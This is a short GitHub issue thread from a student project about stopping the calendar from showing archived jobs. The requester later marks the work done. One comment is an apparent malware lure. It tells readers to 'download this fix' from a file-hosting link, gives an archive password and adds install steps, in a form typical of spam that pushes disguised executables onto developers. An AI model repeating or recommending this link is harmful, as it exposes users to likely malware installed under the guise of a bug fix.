### ISSUE TITLE
Calander update

### ISSUE THREAD

**Issue by JessBloem** [COS301-SE-2024/WorkWise-Central#583]
# Update Request

## Description

Please update the calander in accordance with the deliverables below

## Deliverables

- [x] Calendar should not show archived jobs

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JessBloem** [comment]
The archived jobs still show up on the calander

**Comment by JessBloem** [comment]
Done thank you
